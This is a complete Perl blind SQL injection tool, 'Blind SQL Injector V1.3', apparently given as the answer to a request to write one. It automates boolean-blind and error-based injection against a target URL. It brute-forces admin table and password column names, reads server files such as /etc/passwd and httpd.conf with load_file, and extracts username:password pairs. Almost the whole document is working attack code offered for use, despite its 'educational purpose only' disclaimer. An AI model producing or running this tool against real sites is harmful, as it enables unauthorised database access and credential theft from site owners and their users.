Write a perl SQL injection tool

1. #!/usr/bin/perl
2. # blind sqlinjector [GET Method]
3. # for educational purpose only!
4. # by c4rp3nt3r@0x50sec.org
5.  
6. use POSIX;
7. use LWP::UserAgent;
8.  
9. ######################### 配置信息 开始 #################################
10.  
11. $target ="http://www.0x50sec.org/index.php?p=1'";       # 注射url 字符型注射要在后面加' 并设置闭合注释#!!!
12. $turestr='c4rp3nt3r.jpg';   #！！！ 正确页面字符 需要修改             
13.  
14. ###################### 上面两个必须设置 ###########################
15.  
16. $nullstr="%09";     # %20 + /**/ %09 %0a %0d
17. $comstr="";         # 闭合字符串 # -- /* ;%00 $nullstr."aNd".$nullstr."'1'='1";
18.  
19. $tb_prefix='';      # 设置表名前缀
20.  
21. #fuzz path 配置选项
22. #
23. $somexfile='index.php';
24. $domain='0x50sec.org';
25. $homeusr='c4rp3nt3r';
26.  
27. ########################## 配置信息 结束 #################################   
28.  
29. @tables=(
30. 'admin',
31. 'information_schema.tables',
32. 'zipcode',
33. 'joyboard_admin',
34. 'tbl_manager',
35. 'SuperUser',
36. 'admins',
37. 'n_news',
38. 'enterprise_file_room',
39. 'BOARD_TB',
40. 'ADMIN_TB',
41. 'campuslogin',
42. 'users',
43. 'user',
44. 'usr_pw',
45. 'salt',
46. 'members',
47. 'rg_member',
48. 'mysql.user',
49. 'hash',
50. 'login',
51. 'log_user',
52. 'admin_user',
53. 'adminuser',
54. 'admin_info',
55. 'member_admin',
56. 'AdminUsers',
57. 'administrables',
58. 'administrateur',
59. 'administrateurs',
60. 'login_admin',
61. 'login_admins',
62. 'login_user',
63. 'login_users',
64. 'lost_pass',
65. 'lost_passwords',
66. 'lostpass',
67. 'lostpasswords',
68. 'stnuser',
69. 'stuser',
70. 'stusers',
71. 'stuseres',
72. 'staff',
73. 'u_name',
74. 'u_p',
75. 'u_pass',
76. 'Benutzer',
77. 'usercontrol',
78. 'user_pw',
79. 'Benutzerliste',
80. 'userlogins',
81. 'userpasswd',
82. 'admuser',
83. 'system',
84. 'adm',
85. 'tb_user',
86. 'x_admin',
87. 'm_admin',
88. 'manage',
89. 'member',
90. 'tbl_user',
91. 'tbl_data',
92. 'tbl_users',
93. 'tbl_admin',
94. 'tbl_admins',
95. 'tbl_member',
96. 'tbl_members',
97. 'tbladmins',
98. 'tb_club_admin',
99. 'tb_club_member',
100. 'tb_club_board_admin',
101. 'admin_user',
102. 'admin_userinfo',
103. 'administrator',
104. 'adminid',
105. 'admin_id',
106. 'adminuserid',
107. 'admin_userid',
108. 'AdminUID',
109. 'adminusername',
110. 'admin_username',
111. 'adminname',
112. 'admin_name',
113. 'wp_users',
114. );
115.  
116. #$sql='select table_name from information_schema.tables where TABLE_SCHEMA=0x6368656d limit 0,1';
117. #$final="shit%\' and OrDMiD(($sql),1,1))>";
118. #$final = $final.$num." #";
119.  
120. $x_fuzzsql='';
121.  
122. $subset=1;
123. $subset=$ARGV[1];
124. $num=50;
125. $result="";
126. $result_num="";
127. $oknum=0;
128.  
129. $long=0;
130. $oktbnum='1';
131. @oktb=();
132. $long=@oktb;
133.  
134. @ok_tbname=();
135. $long=@ok_tbname;
136.  
137. @ok_usr_clm=();
138. $long=@ok_usr_clm;
139. @ok_pwd_clm=();
140. $long=@ok_pwd_clm;
141.  
142. @ok_path=();
143. $long=@ok_path;
144.  
145. @ok_clmname=();
146. $long=@ok_clmname;
147.  
148. #---------------------------------------------------------
149. print "\n";
150. print "\t|=-----------------------------------------=|\n";
151. print "\t|=------[ Blind SQL Injector V1.3 ]--------=|\n";
152. print "\t|=-------[ c4rp3nt3r\@0x50sec.org ]---------=|\n";
153. print "\t|=-----------------------------------------=|\n\n";
154.  
155. dump_fuzz_half_alpha();
156.  
157. #fuzz_tb();
158. #fuzz_pwd_usr_clm();
159.  
160. print "-------------------------------\n\n";
161.  
162. print "[+]$x_fuzzsql:\n";
163. #print("@oktb\n");
164. foreach $oktbnum(@oktb)
165. {
166.     printf("%c",$oktbnum);
167. }
168. print "\n";
169.  
170. #print "[+]$sql:\n$result_num\n";
171. #print("@oktb\n");
172. #-------------------------------------------------------------
173.  
174. foreach $x_ok_tbname(@ok_tbname)
175. {
176.     print " ".$x_ok_tbname."\n";
177. }
178. foreach $x_ok_clm(@ok_clmname)
179. {
180.     print " ".$x_ok_clm."\n";
181. }
182. foreach $x_ok_path(@ok_path)
183. {
184.     print " ".$x_ok_path."\n";
185. }
186. print "\n";
187. print "[+] Enjoy Hacking...\n\n\007";
188. print "-------------------------------\n\n";
189.  
190. #################################
191.  
192. sub dump_fuzz_half_alpha
193. {
194.  
195. print 'Choose a number to be execute:
196.     [0] sql (from [STDIN])
197.     [1] version()
198.     [2] database()
199.     [3] user()
200.     [4] dump table_schema v5.x
201.     [5] dump table_name (table_schem=database() v5.x)
202.     [6] dump column_name (table_name= [STDIN] v5.x)
203.     [7] fuzz table_name v4.x
204.     [8] fuzz column_name v4.x
205.     [9] fuzz web path(\'read httpd.conf\')
206.     [a] load_file(\'/etc/passwd\')
207.     [b] load_file(\'c:\\boot.ini\')
208.     [c] load_file(\'file path from [STDIN]\')
209.     [d] load_file(\'file path from [STDIN] error base\')
210.     [e] dump table_schema (v5.x error base)
211.     [f] dump table_name (table_schem=database() v5.x error base)
212.     [g] dump column_name (table_name= [STDIN] v5.x error base)
213.     [h] fuzz table_name (v4.x error base)
214.     [i] fuzz column_name (v4.x error base)
215.     [x] sql (from [STDIN] error base)
216.     ';
217.     print "\n";
218.     print "Choose a number#";
219.     $xnum= ; chomp $xnum;
220.     if($xnum eq '0')
221.     {
222.         print "Enter the sql#";
223.         $sql_stdin= ; chomp $sql_stdin;
224.         dump_fuzz_half($sql_stdin);
225.     }elsif($xnum eq '1')
226.     {
227.         $sql_x='version()';
228.         dump_fuzz_half($sql_x);
229.     }elsif($xnum eq '2')
230.     {
231.         $sql_x='database()';
232.         dump_fuzz_half($sql_x);
233.     }elsif($xnum eq '3')
234.     {
235.         $sql_x='user()';
236.         dump_fuzz_half($sql_x);
237.     }elsif($xnum eq '4')
238.     {
239.         $sql_x='select'.$nullstr.'group_concat(SCHEMA_NAME)'.$nullstr.'from'.$nullstr.'information_schema.SCHEMATA';
240.         dump_fuzz_half($sql_x);
241.     }elsif($xnum eq '5')
242.     {
243.         $sql_x='select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=database()';
244.         dump_fuzz_half($sql_x);
245.     }elsif($xnum eq '6')
246.     {
247.         print "Enter The table_name#";
248.         $sql_stdin= ; chomp $sql_stdin;
249.         $sql_stdin="0x".hexencode($sql_stdin);
250.         $sql_x="select group_concat(column_name) from information_schema.columns where table_name=$sql_stdin";
251.         dump_fuzz_half($sql_x);
252.     }elsif($xnum eq '7')
253.     {
254.         fuzz_tb();
255.     }elsif($xnum eq '8')
256.     {
257.         print "Enter The table name to fuzz the column#";
258.         $sql_stdin= ; chomp $sql_stdin;
259.         fuzz_pwd_usr_clm($sql_stdin);
260.     }elsif($xnum eq '9')
261.     {
262.         fuzz_webpath();
263.     }
264.     elsif($xnum eq 'a')
265.     {
266.         $file_path="load_file(0x".hexencode('/etc/passwd').")";
267.         dump_fuzz_half($file_path);
268.     }elsif($xnum eq 'b')
269.     {
270.         $file_path="load_file(0x".hexencode('c:\\boot.ini').")";
271.         $sql_x="load_file($file_path)";
272.         dump_fuzz_half($sql_x);
273.  
274.     }
275.     elsif($xnum eq 'c')
276.     {
277.         print "Enter The file path to load_file#";
278.         $sql_stdin= ; chomp $sql_stdin;
279.         $file_path="0x".hexencode($sql_stdin);
280.         $sql_x="load_file($file_path)";
281.         dump_fuzz_half($sql_x);
282.     }elsif($xnum eq 'd')
283.     {
284.         print "Enter The file path to load_file#";
285.         $sql_stdin= ; chomp $sql_stdin;
286.         #$sql_stdin='/usr/local/apache2/htdocs/admin/admin.php';
287.         $file_path="0x".hexencode($sql_stdin);
288.         $sql_x="load_file($file_path)";
289.         err_exp($sql_x);
290.     }elsif($xnum eq 'e')
291.     {
292.         $sql_x='select'.$nullstr.'group_concat(SCHEMA_NAME)'.$nullstr.'from'.$nullstr.'information_schema.SCHEMATA';
293.         err_exp($sql_x);
294.  
295.     }elsif($xnum eq 'f')
296.     {
297.  
298.         $sql_x='select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=database()';
299.         err_exp($sql_x);
300.     }elsif($xnum eq 'g')
301.     {
302.         print "Enter The table_name#";
303.         $sql_stdin= ; chomp $sql_stdin;
304.         $sql_stdin="0x".hexencode($sql_stdin);
305.         $sql_x="select group_concat(column_name) from information_schema.columns where table_name=$sql_stdin";
306.         err_exp($sql_x);
307.     }elsif($xnum eq 'h')
308.     {
309.         fuzz_tb_err_exp();
310.     }elsif($xnum eq 'i')
311.     {
312.         print "Enter The table name to fuzz the column#";
313.         $sql_stdin= ; chomp $sql_stdin;
314.         fuzz_pwd_usr_clm_err($sql_stdin);
315.     }elsif($xnum eq 'x')
316.     {
317.         print "Enter the sql#";
318.         $sql_stdin= ; chomp $sql_stdin;
319.         err_exp($sql_stdin);
320.     }
321.  
322. }
323. #################
324. sub hexencode{ #Sub to hex encode
325. @subvar= @_;
326. my $sqlstr = $subvar[0];
327. my $encoded_command="";
328. my @ASCII = unpack("C*", $sqlstr);
329. foreach $line (@ASCII) {
330.  
331. my $encoded = sprintf('%lx',$line);
332. $encoded_command .= $encoded;
333. }
334. return $encoded_command;
335. }
336.  
337. #################
338. sub fuzz_webpath
339. {
340.  
341. @ok_path=();
342. $long=@ok_path;
343.  
344. print "[*] Fuzzing path ...\n\n";
345. @paths=(
346. '/usr/local/apache/conf/httpd.conf',
347. '/usr/local/apache2/conf/httpd.conf',
348. '/usr/local/apache2/conf/extra/httpd-ssl.conf', #apache2.2
349. '/usr/local/etc/apache/httpd.conf',
350. '/etc/apache2/apache2.conf',                #ubuntu 2.0
351. '/etc/httpd/conf/httpd.conf',
352. '/var/log/apache2/error_log',
353. '/var/log/apache/access_log',
354. '/var/apache2/logs/error_log',
355. '/var/log/httpd/error_log',
356. '/etc/passwd',
357. '/etc/issue',
358. '/proc/version',
359. '/proc/self/environ',
360. );
361.  
362. @wwwpaths=(
363. '/var/www/',
364. '/data/html/',
365. '/www/htdocs/',
366. '/home/webadm/',
367. '/home/webadm/public_html/',
368. '/usr/local/webroot/',
369. '/var/apache2/htdocs/',
370. '/var/www/htdocs/',
371. '/var/www/html/',
372. '/opt/lampp/htdocs/',
373. '/var/www/localhost/htdocs/',
374. '/usr/local/apache/htdocs/',
375. '/usr/local/apache2/htdocs/',
376. '/usr/local/www/apache22/data/',
377. '/usr/local/www/data/',
378. '/export/home/webhost/apache/apache1/htdocs/',
379. '/web/',
380. '/data/',
381. '/www/',
382. "/home/$homeusr/html/",
383. "/home/$homeusr/docs/",
384. "/home/$homeusr/public_html/",
385. "/home/$homeusr/www/",
386. "/home/$domain/www/",
387. "/home/$domain/public_html/",
388. "/www/htdocs/$domain/",
389. "/home/$homeusr/$domain/",
390. "/usr/local/webroot/$domain/",
391. "/home/$homeusr/",
392. "/www/users/$domain/",
393. "/home/hosting_users/$homeusr/",
394. "/data/webroot/$domain/",
395. "/export/$homeusr/public_html/",
396. "/home/www/websites/",
397. "/home/www/websites/$homeusr/",
398. "/var/www/html/$homeusr",
399. );
400.  
401.     foreach $path(@paths)
402.     {
403.         my $xfile="0x".hexencode($path);
404.         $final=$target.$nullstr.'aND'.$nullstr.'length(load_file('.$xfile.'))>0'.$comstr;
405.         $ua =  new LWP::UserAgent or die;
406.         $ua->timeout(35);
407.         $ua->proxy("http", "http://$proxy/") if defined($proxy);
408.         $tbres = $ua->get($final);
409.         print $final."\n";
410.         print "[*] Fuzzing web path  [$path]"."\n";
411.         if($tbres->content =~ /$turestr/)
412.         {
413.         $result=$result."[+] Found ->".$path."\n\n";
414.         print " \n[+] Found web path-> [$path]"."\n\n";
415.         $long=@ok_path;
416.         @ok_path[$long]=$path;  #将存在的表名放到一个数组里
417.         }
418.     }
419.     foreach $wpath(@wwwpaths)
420.     {
421.         $some='index.php';
422.         $wpath=$wpath.$some;
423.         my $xxfile="0x".hexencode($wpath);
424.         $final=$target.$nullstr.'aND'.$nullstr.'LEnGth(lOad_FiLe('.$xxfile.'))>0'.$comstr;
425.         $ua2 =  new LWP::UserAgent or die;
426.         $ua2->timeout(35);
427.         $ua2->proxy("http", "http://$proxy/") if defined($proxy);
428.         $tbres = $ua2->get($final);
429.         print "[*] Fuzzing web path [$wpath]"."\n";
430.         print $final."\n";
431.         if($tbres->content =~ /$turestr/)
432.         {
433.             $result=$result."[+] Found ->".$wpath."\n\n";
434.             print " \n[+] Found web path-> [$wpath]"."\n\n";
435.             $long=@ok_path;
436.             @ok_path[$long]=$wpath; #将存在的表名放到一个数组里
437.         }
438.     }
439. }
440.  
441. sub fuzz_tb_err_exp
442. {
443. $xsql = 'SeLEcT'.$nullstr.'CoUNt(*)'.$nullstr.'fRoM';#.think_md5hash)>0--
444.  
445. #if($version==4)就是一个爆破表名的工具
446. #print "$sql\n\007\n";
447. @ok_tbname=();
448. $long=@ok_tbname;
449.  
450. print "[*]Fuzz table name...\n\n";
451.  
452.     foreach $tbname(@tables)
453.     {
454.  
455.         print "[*]Fuzz table name [$tbname]"."\n";
456.         $sqlexp = $xsql.$nullstr.$tb_prefix.$tbname;
457.         $ua =  new LWP::UserAgent or die;
458.         $ua->timeout(35);
459.         $ua->proxy("http", "http://$proxy/") if defined($proxy);
460.  
461.         $payload = "aNd+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($sqlexp)),1,62)))a+from+information_schema.tables+group+by+a)b)";
462.         $final=$target.'+'.$payload.$comstr;
463.         print $final."\n";
464.         $res=$ua->get($final);
465.         #print $res->content;
466.         if ($res->content =~/Duplicate entry \'1([\s\S]*)\' for key /)
467.         {
468.             $content = $&;
469.             $content =~ s/Duplicate entry \'1//;
470.             $content =~ s/\' for key //;
471.             if(length($content)<1)
472.             {
473.             print "[+] got data finished!\n";
474.             next;
475.             }else
476.             {
477.  
478.                 print " \n[+] Found table_name-> [$tbname]"."\n\n";
479.                 $long=@ok_tbname;
480.                 @ok_tbname[$long]=$tbname;  #将存在的表名放到一个数组里
481.                 $result = $content;
482.                 print "[+] content : \n$result\n\n";
483.             }
484.         }else
485.         {
486.             print "[-]$tbname doesn't exist!\n";
487.             next;
488.         }
489.  
490.     }
491.  
492. }
493.  
494. sub fuzz_tb
495. {
496. $xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt(*)'.$nullstr.'fRoM';#.think_md5hash)>0--
497.  
498. #if($version==4)就是一个爆破表名的工具
499. #print "$sql\n\007\n";
500. @ok_tbname=();
501. $long=@ok_tbname;
502.  
503. print "[*]Fuzz table name...\n\n";
504.  
505.     foreach $tbname(@tables)
506.     {
507.         $final=$target.$xsql.$nullstr.$tb_prefix.$tbname.')'.$comstr;
508.         $ua =  new LWP::UserAgent or die;
509.         $ua->timeout(35);
510.         $ua->proxy("http", "http://$proxy/") if defined($proxy);
511.         $tbres = $ua->get($final);
512.         print "[*]Fuzz table name [$tbname]"."\n";
513.         print $final."\n";
514.         if($tbres->content =~ /$turestr/)
515.         {
516.             $result=$result."[+] Found ->".$tbname."\n\n";
517.             print " \n[+] Found table_name-> [$tbname]"."\n\n";
518.             $long=@ok_tbname;
519.             @ok_tbname[$long]=$tbname;  #将存在的表名放到一个数组里
520.         }
521.     }
522.  
523. }
524. ###################
525. sub fuzz_pwd_usr_clm_err
526. {
527. my($xok_tbname)=@_;
528. ##-------
529.  
530. @usrclms=(
531. 'id',
532. 'idx',
533. 'admin',
534. 'adminname',
535. 'admin_id',
536. 'user_name',
537. 'user',
538. 'username',
539. 'login',
540. 'email',
541. 'user_id',
542. 'no',
543. 'uid',
544. 'cnumber',
545. 'zipcode',
546. 'job',
547. 'mail',
548. 'usr',
549. 'name',
550. 'u_name',
551. 'login_id',
552. 'administrators',
553. 'administrator',
554. 'adminuser',
555. 'adminname',
556. 'admin_name',
557. 'admin_user',
558. 'admin_username',
559. 'user_admin',
560. 'user_n',
561. 'AD_id',
562. 'user_un',
563. 'user_uname',
564. 'user_username',
565. 'user_usernm',
566. 'user_usernun',
567. 'user_usrnm',
568. 'usr',
569. 'usr_n',
570. 'usr_name',
571. 'usr_pass',
572. 'usr2',
573. 'usrn',
574. 'userid',
575. 'usrnam',
576. 'usrname',
577. 'usrnm',
578. 'adminusername',
579. 'bbsuser',
580. 'bbsid',
581. 'bbsusername',
582. 'permission',
583. 'access',
584. 'accnt',
585. 'accnts',
586. 'account',
587. 'accounts',
588. '帐号',
589. '管理员',
590. '权限',
591. '用户名',
592. '会员',
593. '用户帐号',
594. );
595. @pwdclms=(
596. 'password',
597. 'userpass',
598. 'pass',
599. 'pwd',
600. 'psw',
601. 'userpwd',
602. 'userpw',
603. 'psd',
604. 'pw',
605. 'user_pass',
606. 'admin_password',
607. 'PassWD',
608. 'user_password',
609. 'uPassword',
610. 'user_pwd',
611. 'adminpwd',
612. 'admin_pass',
613. 'admin_pwd',
614. 'admin_password',
615. 'login_pass',
616. 'login_passwd',
617. 'login_password',
618. 'login_pw',
619. 'AD_pass',
620. 'login_pwd',
621. 'login_user',
622. 'login_username',
623. 'adminpsw',
624. 'adminupass',
625. 'user_pass',
626. 'user_passw',
627. 'user_passwd',
628. 'user_pw',
629. 'user_pwd',
630. 'user_pword',
631. 'pword',
632. 'user_pwrd',
633. '密码',
634. '用户密码',
635. '编号',
636. );
637.  
638.     $ua =  new LWP::UserAgent or die;
639.     $ua->timeout(35);
640.     $ua->proxy("http", "http://$proxy/") if defined($proxy);
641.  
642.     print "\n[*]Fuzz user column name...\n\n";
643.     foreach $usr_clm(@usrclms)
644.     {
645.  
646.         $sqlexp = 'SeLEcT'.$nullstr.'CoUNt('.$usr_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname;
647.         $payload = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($sqlexp)),1,62)))a+from+information_schema.tables+group+by+a)b)";
648.         $final=$target.'+'.$payload.$comstr;
649.         print $final."\n";
650.         $res=$ua->get($final);
651.         #print $res->content;
652.         if ($res->content =~/Duplicate entry \'1([\s\S]*)\' for key /)
653.         {
654.             $content = $&;
655.             $content =~ s/Duplicate entry \'1//;
656.             $content =~ s/\' for key //;
657.             if(length($content)<1)
658.             {
659.             print "[+] got data finished!\n";
660.             next;
661.             }else
662.             {
663.                 $result=$result."[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n";
664.                 print "\n[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
665.                 $usr=$usr_clm;
666.                 $long=@ok_clmname;
667.                 $ok_clmname[$long]=$usr_clm;
668.                 $result = $content;
669.                 print "[+] content : \n$usr_clm\n\n";
670.             }
671.         }else
672.         {
673.             print "[-]$usr_clm doesn't exist!\n";
674.             next;
675.         }
676.  
677.     }
678.  
679.     print "\n[*]Fuzz password column name...\n\n";
680.     foreach $pwd_clm(@pwdclms)
681.     {
682.         $sqlexp = 'SeLEcT'.$nullstr.'CoUNt('.$pwd_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname;
683.         $payload = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($sqlexp)),1,62)))a+from+information_schema.tables+group+by+a)b)";
684.         $final=$target.'+'.$payload.$comstr;
685.         print $final."\n";
686.         $res=$ua->get($final);
687.         #print $res->content;
688.         if ($res->content =~/Duplicate entry \'1([\s\S]*)\' for key /)
689.         {
690.             $content = $&;
691.             $content =~ s/Duplicate entry \'1//;
692.             $content =~ s/\' for key //;
693.             if(length($content)<1)
694.             {
695.             print "[+] got data finished!\n";
696.             next;
697.             }else
698.             {
699.                 $result=$result."[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n";
700.                 print "\n[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
701.                 $pwd=$pwd_clm;
702.                 $long=@ok_clmname;
703.                 $ok_clmname[$long]=$pwd_clm;
704.                 $result = $content;
705.                 print "[+] content : \n$pwd_clm\n\n";
706.             }
707.         }else
708.         {
709.             print "[-]$pwd_clm doesn't exist!\n";
710.             next;
711.         }
712.     }
713.     $fuzzsql="seleCt concat($usr,0x3a,$pwd) from $xok_tbname limit 1";
714.     print "[+]".$fuzzsql."\n";
715.     #dump_fuzz_half($fuzzsql);
716.  
717. }
718. ##################################
719. sub fuzz_pwd_usr_clm
720. {
721. my($xok_tbname)=@_;
722. ##-------
723.  
724. @usrclms=(
725. 'id',
726. 'idx',
727. 'admin',
728. 'adminname',
729. 'admin_id',
730. 'user_name',
731. 'user',
732. 'username',
733. 'login',
734. 'email',
735. 'mail',
736. 'AD_id',
737. 'usr',
738. 'name',
739. 'u_name',
740. 'login_id',
741. 'administrators',
742. 'administrator',
743. 'adminuser',
744. 'adminname',
745. 'admin_name',
746. 'admin_user',
747. 'admin_username',
748. 'user_admin',
749. 'user_n',
750. 'user_un',
751. 'user_uname',
752. 'user_username',
753. 'user_usernm',
754. 'user_usernun',
755. 'user_usrnm',
756. 'usr',
757. 'usr_n',
758. 'usr_name',
759. 'usr_pass',
760. 'usr2',
761. 'usrn',
762. 'userid',
763. 'usrnam',
764. 'usrname',
765. 'usrnm',
766. 'adminusername',
767. 'bbsuser',
768. 'bbsid',
769. 'bbsusername',
770. 'permission',
771. 'access',
772. 'accnt',
773. 'accnts',
774. 'account',
775. 'accounts',
776. '帐号',
777. '管理员',
778. '权限',
779. '用户名',
780. '会员',
781. '用户帐号',
782. );
783. @pwdclms=(
784. 'password',
785. 'userpass',
786. 'pass',
787. 'pwd',
788. 'psw',
789. 'userpwd',
790. 'userpw',
791. 'psd',
792. 'pw',
793. 'user_pass',
794. 'admin_password',
795. 'PassWD',
796. 'user_password',
797. 'uPassword',
798. 'user_pwd',
799. 'adminpwd',
800. 'admin_pass',
801. 'admin_password',
802. 'login_pass',
803. 'login_passwd',
804. 'login_password',
805. 'login_pw',
806. 'login_pwd',
807. 'login_user',
808. 'login_username',
809. 'adminpsw',
810. 'AD_pass',
811. 'admin_pwd',
812. 'adminupass',
813. 'user_pass',
814. 'user_passw',
815. 'user_passwd',
816. 'user_pw',
817. 'user_pwd',
818. 'user_pword',
819. 'pword',
820. 'user_pwrd',
821. '密码',
822. '用户密码',
823. '编号',
824. );
825.  
826.     $ua =  new LWP::UserAgent or die;
827.     $ua->timeout(35);
828.     $ua->proxy("http", "http://$proxy/") if defined($proxy);
829.  
830.     print "\n[*]Fuzz user column name...\n\n";
831.     foreach $usr_clm(@usrclms)
832.     {
833.         $xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$usr_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
834.         $final=$target.$xsql;
835.         $tbres = $ua->get($final);
836.         print "[*]Fuzz $usr_clm from $xok_tbname ...\n";
837.         print $final."\n";
838.         if($tbres->content =~ /$turestr/)
839.         {
840.             $result=$result."[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n";
841.             print "\n[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
842.             $usr=$usr_clm;
843.             $long=@ok_clmname;
844.             $ok_clmname[$long]=$usr_clm;
845.             #last;
846.         }
847.     }
848.  
849.     print "\n[*]Fuzz password column name...\n\n";
850.     foreach $pwd_clm(@pwdclms)
851.     {
852.         $xsql = $nullstr."union".$nullstr."select".$nullstr;
853.     $xsql =
854.     $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$pwd_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
855.  
856.         $final=$target.$xsql;
857.         $tbres = $ua->get($final);
858.         print "[*]Fuzz [$pwd_clm] from [$xok_tbname] ...\n";
859.         print $final."\n";
860.         if($tbres->content =~ /$turestr/)
861.         {
862.             $result=$result."[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n";
863.             print "\n[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
864.             $pwd=$pwd_clm;
865.             $long=@ok_clmname;
866.             $ok_clmname[$long]=$pwd_clm;
867.             #last;
868.         }
869.     }
870.     $fuzzsql="seleCt concat($usr,0x3a,$pwd) from $xok_tbname limit 1";
871.     print "[+]".$fuzzsql."\n";
872.     #dump_fuzz_half($fuzzsql);
873.  
874. }
875.  
876. #################################
877. sub dump_fuzz_half
878. {
879.     my($fuzzsql) = @_;
880.     #$fuzzsql="seleCt concat($usr,0x3a,$pwd) from $xok_tbname limit 1";
881.     $fucked='';
882.     for($subset=1;$subset<800;$subset++)
883.     {
884.         $oknum=fuzz_half($fuzzsql,$subset,0,127);
885.         if($oknum==0)
886.         {
887.             $long=@oktb;
888.             @oktb[$long]=10;
889.             last;
890.         }
891.         $result.=$subset.":".$oknum."\n";
892.         $result_num.=$oknum." ";
893.         $long=@oktb;
894.         @oktb[$long]=$oknum;
895.         #print "$result";
896.         #print "$result_num\n";
897.         print "[+]$fuzzsql:\n";
898.  
899.         foreach $xoktbnum(@oktb)
900.         {
901.             printf("%c",$xoktbnum);
902.         }
903.         print "\n\n";
904.     }
905.     print "\n\n\n";
906.  
907. }
908.  
909. ##################################
910. sub fuzz_half   #order by语句递归查询函数采用折半法
911. {
912.    #($min,$max)区间代表一个范围，正确的字段数在其中我们折半缩小之直到找到正确字段数
913.    #$min 代表能够正常显示的已经确定的最小整数
914.    #$max 代表不能够正常显示的已经确定的最小整数，作为我们可以确定的范围的最大数所以叫其"max"
915.    my ($sql,$subset,$min, $max) = @_;
916.    $x_fuzzsql=$sql;
917.    if($max==1&&$min==0)
918.    {
919.         return 0;
920.    }
921.    if($max-$min==1)#如果能正常显示的最小整数比不能正常显示的最小整数大一那么最小的数$min
922.     {               #就是要找的正确字段数目退出递归函数返回之
923.         return $max;
924.    }
925.    #如果上面条件没成立就取范围中间的数字作为order by查询字段数
926.    my $mid=int(($min+$max)/2);#取两个正整数的平均值
927.    #print "max:$max,min:$min,mid=$mid\n";
928.     $final=$nullstr."AnD".$nullstr."ascii(mid(($sql)%2C".$nullstr."$subset%2C".$nullstr."1))>";
929.     $final = $target.$final.$mid.$comstr;
930.  
931.     print "[*] Test ascii(MiD(($sql)%2C$subset%2C1))>$mid...\n";
932.     print $final."\n";
933.    #print $final."\n";
934.     my $lwp = new LWP::UserAgent or die;
935.     $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
936.  
937.    my $res = $lwp->get($final);
938.     my $myres=$res->content; #for test
939.    #printf($myres) ;    #for test
940.    #if($myres=~/http:\/\/login.renren.com\/callback.do/)
941.     #To judge if the login is sucess
942.     if($res->content =~ /$turestr/)
943.    {
944.         $min=$mid;
945.         fuzz_half($sql,$subset,$min,$max);
946.    }
947.     else
948.     {
949.         $max=$mid;
950.         fuzz_half($sql,$subset,$min,$max);
951.     }
952. }
953.  
954. sub err_exp
955. {
956.     my($loadx) = @_;
957.  
958.     $ua2 = new LWP::UserAgent or die;
959.     $ua2->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
960.     $ua2->timeout(35);
961.     $ua2->proxy("http", "http://$proxy/") if defined($proxy);
962.     $result='';
963.     for($i=1;$i<8000;$i=$i+62)
964.     {
965.         #当对此库from+information_schema无权限的时候要换成其他已知库
966.         #$xsql = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($loadx)),$i,62)))a+from+information_schema.tables+group by a)b)";
967.         $xsql = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($loadx)),$i,62)))a+from+information_schema.tables+group+by+a)b)";
968.         $final=$target.'+'.$xsql.$comstr;
969.         print $final."\n";
970.         $res=$ua2->get($final);
971.         #print $res->content;
972.         if ($res->content =~/Duplicate entry \'1\' for key /)
973.         {
974.             print "[+] got data finished!\n";
975.             last;
976.         }
977.         if ($res->content =~ /Duplicate entry \'1([\s\S]*)\' for key /s)
978.         {
979.             $content = $&;
980.             $content =~ s/Duplicate entry \'1//g;
981.             #$content =~ s/\' for key //;
982.             if(length($content)<1)
983.             {
984.                 print "[+] got data finished!\n";
985.                 last;
986.  
987.             }
988.             $position = index($content,"\' for key ");
989.             $content = substr($content,0,$position);
990.  
991.             $result .= $content;
992.             print "[+] content : \n$result\n\n";
993.         }else
994.         {
995.             print "[-]can not got data!\n";
996.             last;
997.         }
998.     }
999.     print "[+] result : \n$result\n\n";
1000.     open(FH,">>result.txt");
1001.     print FH ("$result\n\n");
1002.     close(FH);
1003. }